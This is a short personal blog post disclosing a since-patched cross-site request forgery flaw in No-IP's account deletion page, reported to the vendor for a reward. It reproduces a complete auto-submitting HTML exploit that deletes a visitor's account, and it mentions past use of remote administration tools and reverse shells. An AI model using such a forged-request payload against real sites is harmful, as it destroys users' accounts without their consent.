No-Ip is a free DNS providing service for users. I’ve signed up for an account when I was at the age of eleven long times back. Mainly I used it for configuring my RATs (Remote Administration Tools) for forwarding the connection from the No-IP DNS to my external IP. So it was long time back and I just used it for testing purposes only. After that I’ve never wanted to use a DNS service for any reason. One day I accidently visited no-ip and to my surprise my previous account was still active which I created long time back 🙂
I did not have any intention of finding any kind of vulnerability. But at that moment my Burp Suite was in intercepting mode and I was experimenting with another web application. I created a new no-ip account for testing some of my reverse tcp dns shells. After the testing was done I just deleted my account since it was a fake random account. As time passed by testing my other application and my shells I saw the HTTP request of the deletion of my fake no-ip account in the history. It had no XSRF token used. W00t! I was able to delete any account when the user just opens my malicious request. Well, Here is the proof of concept.
<html> <!-- Title: NOIP.COM Permanent Delete Account Exploit Author: Osanda Malith (@OsandaMalith) Date: 05th April 2014 --> <body> <form name="exploit" action="https://www.noip.com/members/account/delete.php" method="POST"> <input type="hidden" name="deleteAccount" value="yes" /> <input type="hidden" name="delete" value="delete" /> <input type="hidden" name="submit" value="Change" /> <script>document.exploit.submit(); </script> </form> </body> </html>
As soon as I found this I reported it to NoIP and I got rewarded with two t-shirts, some stickers and a nice letter 🙂
Now the issue is patched as they have a valid token.
POST /members/account/delete.php HTTP/1.1 Host: www.noip.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.noip.com/members/account/delete.php Cookie: Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 58 token=glXd3wIAPR8y2y9O&delete=delete&submit=Delete+Account
So this bug made me remind of my child hood 🙂 Nothing serious it’s just XSRF. I never used DNS services for spreading malware or anything unethical. Basically when I was a kid for my curiosity to learn.